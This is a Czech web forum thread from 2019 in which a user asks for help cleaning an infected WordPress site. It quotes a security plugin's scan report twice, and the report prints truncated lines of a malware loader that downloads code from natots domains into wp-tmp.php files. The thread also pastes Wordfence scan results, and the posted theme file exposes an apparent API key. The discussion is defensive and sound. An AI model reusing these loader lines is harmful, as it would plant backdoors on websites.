Wordpress - Antivirus ukazuje virus ve function.php, tam jsem, ale vše promazal.

Pročistil jsem functions.php, ale stále mi ukazuje plugin Antivirus , že v šabloně ve functions php je něco , ale tam nic takového neni...

Jinak mi asi prosím doporučte nejlepší postup na odvirování wordpresu. nejlepší plugin třeba....a tak.

Tohle je functions.php

Kód:

<?php
/**
 * Understrap functions and definitions
 *
 * @package understrap
 */

 function isa_add_img_title( $attr, $attachment = null ) {

    $img_title = trim( strip_tags( $attachment->post_title ) );

    $attr['title'] = $img_title;
    $attr['alt'] = $img_title;

    return $attr;
}
add_filter( 'wp_get_attachment_image_attributes','isa_add_img_title', 10, 2 );




/**
 * Initialize theme default settings
 */
require get_template_directory() . '/inc/theme-settings.php';

/**
 * Theme setup and custom theme supports.
 */
require get_template_directory() . '/inc/setup.php';

/**
 * Register widget area.
 */
require get_template_directory() . '/inc/widgets.php';

/**
 * Enqueue scripts and styles.
 */
require get_template_directory() . '/inc/enqueue.php';

/**
 * Custom template tags for this theme.
 */
require get_template_directory() . '/inc/template-tags.php';

/**
 * Custom pagination for this theme.
 */
require get_template_directory() . '/inc/pagination.php';

/**
 * Custom functions that act independently of the theme templates.
 */
require get_template_directory() . '/inc/extras.php';

/**
 * Customizer additions.
 */
require get_template_directory() . '/inc/customizer.php';

/**
 * Custom Comments file.
 */
require get_template_directory() . '/inc/custom-comments.php';

/**
 * Load Jetpack compatibility file.
 */
require get_template_directory() . '/inc/jetpack.php';

/**
 * Load custom WordPress nav walker.
 */
require get_template_directory() . '/inc/bootstrap-wp-navwalker.php';

/**
 * Load WooCommerce functions.
 */
require get_template_directory() . '/inc/woocommerce.php';

/**
 * Load Editor functions.
 */
require get_template_directory() . '/inc/editor.php';




  
function my_acf_init() {
	
	acf_update_setting('google_api_key', 'AIzaSyAwqSoFkZfM3C8CXKFAK-0s-QOxcM74oJA');
}

add_action('acf/init', 'my_acf_init'); 




 
// remove dashicons in frontend to non-admin 
    function wpdocs_dequeue_dashicon() {
        if (current_user_can( 'update_core' )) {
            return;
        }
        wp_deregister_style('dashicons');
    }
    add_action( 'wp_enqueue_scripts', 'wpdocs_dequeue_dashicon' );

Zpráva pluginu antivir:

/themes/understrap/functions.php

This is not a virus
if ($file = @file_get_contents(__FILE__))

This is not a virus
@file_put_contents(__FILE__, $file);

This is not a virus
if ($file = @file_get_contents(__FILE__))

This is not a virus
@file_put_contents(__FILE__, $file);

This is not a virus
$ch = curl_init();

This is not a virus
$data = curl_exec($ch);

This is not a virus
$handle = fopen($tmpfname, "w+");

This is not a virus
$handle = fopen($tmpfname, "w+");

This is not a virus
fclose($handle);

This is not a virus
if (($tmpcontent = @file_get_contents("http://www.natots.com/code.php") OR $tmp ...

This is not a virus
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpc ...

This is not a virus
@file_put_contents(get_template_directory() . '/wp-tmp.php', ...

This is not a virus
@file_put_contents('wp-tmp.php', $tmpcontent);

This is not a virus
elseif ($tmpcontent = @file_get_contents("http://www.natots.pw/code.php") AND str ...

This is not a virus
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpc ...

This is not a virus
@file_put_contents(get_template_directory() . '/wp-tmp.php', ...

This is not a virus
@file_put_contents('wp-tmp.php', $tmpcontent);

This is not a virus
elseif ($tmpcontent = @file_get_contents("http://www.natots.xyz/code.php") AND st ...

This is not a virus
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpc ...

This is not a virus
@file_put_contents(get_template_directory() . '/wp-tmp.php', ...

This is not a virus
@file_put_contents('wp-tmp.php', $tmpcontent);

This is not a virus
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND s ...

This is not a virus
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') ...

This is not a virus
} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $w ...

Zkus toto - https://wordpress.org/plugins/wordfence/ .. pomohl zatím všude, kde něco bylo.

Občas tyhle věci hazí false positive.

---------- Post added 30.03.2019 at 11:43 ----------

btw ten kód není normální, z understrap/functions.php, smazat

Ten kod jsem nenašel, ale byl tam nějakej balast a ten jsem smazal

a udělal jsem scan na wordfence....

File appears to be malicious: wp-content/themes/understrap/functions.php
Type: File
Issue Found 30. 3. 2019 12:38
Critical
Repair
Ignore

Details

Need help with a hacked website?

Our team of security experts will clean the infection and remove malicious content. Once your site is restored we will provide a detailed report of our findings. Includes a 1-year Wordfence Premium license.

File appears to be malicious: wp-content/plugins/search-filter-pro/admin/class-search-filter-admin.php
Type: File
Issue Found 30. 3. 2019 12:38
Critical
Ignore

Details

File appears to be malicious: wp-includes/post.php
Type: File
Issue Found 30. 3. 2019 12:38
Critical
Repair
Ignore

Details

File appears to be malicious: wp-includes/wp-vcd.php
Type: File
Issue Found 30. 3. 2019 12:38
Critical
Ignore

Details

File appears to be malicious: wp-includes/wp-tmp.php
Type: File
Issue Found 30. 3. 2019 12:38
Critical
Ignore

Details

WordPress core file modified: wp-includes/general-template.php
Type: File
Issue Found 30. 3. 2019 12:33
High
Repair
Ignore

Details

WordPress core file modified: wp-includes/post.php
Type: File
Issue Found 30. 3. 2019 12:33
High
Repair
Ignore

Details

Unknown file in WordPress core: wp-includes/wp-feed.php
Type: File
Issue Found 30. 3. 2019 12:33
High
Ignore

Details

Unknown file in WordPress core: wp-includes/wp-tmp.php
Type: File
Issue Found 30. 3. 2019 12:33
High
Ignore

Details

Unknown file in WordPress core: wp-includes/wp-vcd.php
Type: File
Issue Found 30. 3. 2019 12:33
Hig

To chce pročistit někým, kdo tomu rozumí.

Původně odeslal PetrGargulák

Pročistil jsem functions.php, ale stále mi ukazuje plugin Antivirus , že v šabloně ve functions php je něco , ale tam nic takového neni...

Jinak mi asi prosím doporučte nejlepší postup na odvirování wordpresu. nejlepší plugin třeba....a tak.

Tohle je functions.php

Kód:

<?php
/**
 * Understrap functions and definitions
 *
 * @package understrap
 */

 function isa_add_img_title( $attr, $attachment = null ) {

    $img_title = trim( strip_tags( $attachment->post_title ) );

    $attr['title'] = $img_title;
    $attr['alt'] = $img_title;

    return $attr;
}
add_filter( 'wp_get_attachment_image_attributes','isa_add_img_title', 10, 2 );




/**
 * Initialize theme default settings
 */
require get_template_directory() . '/inc/theme-settings.php';

/**
 * Theme setup and custom theme supports.
 */
require get_template_directory() . '/inc/setup.php';

/**
 * Register widget area.
 */
require get_template_directory() . '/inc/widgets.php';

/**
 * Enqueue scripts and styles.
 */
require get_template_directory() . '/inc/enqueue.php';

/**
 * Custom template tags for this theme.
 */
require get_template_directory() . '/inc/template-tags.php';

/**
 * Custom pagination for this theme.
 */
require get_template_directory() . '/inc/pagination.php';

/**
 * Custom functions that act independently of the theme templates.
 */
require get_template_directory() . '/inc/extras.php';

/**
 * Customizer additions.
 */
require get_template_directory() . '/inc/customizer.php';

/**
 * Custom Comments file.
 */
require get_template_directory() . '/inc/custom-comments.php';

/**
 * Load Jetpack compatibility file.
 */
require get_template_directory() . '/inc/jetpack.php';

/**
 * Load custom WordPress nav walker.
 */
require get_template_directory() . '/inc/bootstrap-wp-navwalker.php';

/**
 * Load WooCommerce functions.
 */
require get_template_directory() . '/inc/woocommerce.php';

/**
 * Load Editor functions.
 */
require get_template_directory() . '/inc/editor.php';




  
function my_acf_init() {
	
	acf_update_setting('google_api_key', 'AIzaSyAwqSoFkZfM3C8CXKFAK-0s-QOxcM74oJA');
}

add_action('acf/init', 'my_acf_init'); 




 
// remove dashicons in frontend to non-admin 
    function wpdocs_dequeue_dashicon() {
        if (current_user_can( 'update_core' )) {
            return;
        }
        wp_deregister_style('dashicons');
    }
    add_action( 'wp_enqueue_scripts', 'wpdocs_dequeue_dashicon' );

Zpráva pluginu antivir:

/themes/understrap/functions.php

This is not a virus
if ($file = @file_get_contents(__FILE__))

This is not a virus
@file_put_contents(__FILE__, $file);

This is not a virus
if ($file = @file_get_contents(__FILE__))

This is not a virus
@file_put_contents(__FILE__, $file);

This is not a virus
$ch = curl_init();

This is not a virus
$data = curl_exec($ch);

This is not a virus
$handle = fopen($tmpfname, "w+");

This is not a virus
$handle = fopen($tmpfname, "w+");

This is not a virus
fclose($handle);

This is not a virus
if (($tmpcontent = @file_get_contents("http://www.natots.com/code.php") OR $tmp ...

This is not a virus
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpc ...

This is not a virus
@file_put_contents(get_template_directory() . '/wp-tmp.php', ...

This is not a virus
@file_put_contents('wp-tmp.php', $tmpcontent);

This is not a virus
elseif ($tmpcontent = @file_get_contents("http://www.natots.pw/code.php") AND str ...

This is not a virus
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpc ...

This is not a virus
@file_put_contents(get_template_directory() . '/wp-tmp.php', ...

This is not a virus
@file_put_contents('wp-tmp.php', $tmpcontent);

This is not a virus
elseif ($tmpcontent = @file_get_contents("http://www.natots.xyz/code.php") AND st ...

This is not a virus
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpc ...

This is not a virus
@file_put_contents(get_template_directory() . '/wp-tmp.php', ...

This is not a virus
@file_put_contents('wp-tmp.php', $tmpcontent);

This is not a virus
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND s ...

This is not a virus
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') ...

This is not a virus
} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $w ...

To není chyba pouze ve functions.

A proč si neuděláš zálohu DB a nenahraješ čistou instalaci WP? Nebude to rychlejší?

neni to jen o pluginu ale hlavne o znalostech

Tak kdo chce , ať sem hodí cenu za kterou to dá nebo mě do zpráv jak kdo chce, poptávám zrychlení a odvirování wordpresu.

Proč to budeš u někoho poptávat? Udělej zálohu DB a nahraj čistý WP ne?

Původně odeslal Wladass

Proč to budeš u někoho poptávat? Udělej zálohu DB a nahraj čistý WP ne?

To bys musel vědět na jistotu, že db je čistá

---------- Post added 30.03.2019 at 18:45 ----------

Nemluvě o faktu, že wp-content nemůžeš jen tak smazat.

Nejsem si úplně jistý, ale neznám způsob, přes který by šlo napadnout WP skrze nečistou db, jak udáváš.

Původně odeslal Wladass

Nejsem si úplně jistý, ale neznám způsob, přes který by šlo napadnout WP skrze nečistou db, jak udáváš.

Třeba tak, že v příspěvcich jsou js skripta, které dělají bordel. Nedávno jsem našel skript, který tvořil adminy (takže do nového wp se stejně dostanou) apd. To, že vyřešíš ftp neznamená, že vyřešíš db.

Původně odeslal Wladass

Nejsem si úplně jistý, ale neznám způsob, přes který by šlo napadnout WP skrze nečistou db, jak udáváš.

To jsem si před x lety myslel také, než jsem se setkal s napadenou databází u phpbb.

Původně odeslal Tomve

Třeba tak, že v příspěvcich jsou js skripta, které dělají bordel. Nedávno jsem našel skript, který tvořil adminy (takže do nového wp se stejně dostanou) apd. To, že vyřešíš ftp neznamená, že vyřešíš db.

Zajímavé, to jsem nevěděl. Dík za poznatek.

Původně odeslal Depotys

To jsem si před x lety myslel také, než jsem se setkal s napadenou databází u phpbb.

Útočník si vytvořil uživatele s admin právy? :)

[QUOTE=Wladass;1519680]A proč si neuděláš zálohu DB a nenahraješ čistou instalaci WP? Nebude to rychlejší?[/QUOT

Nakonec jsem to udělal sám a ve wordfence je to čistý a vše správně funguje.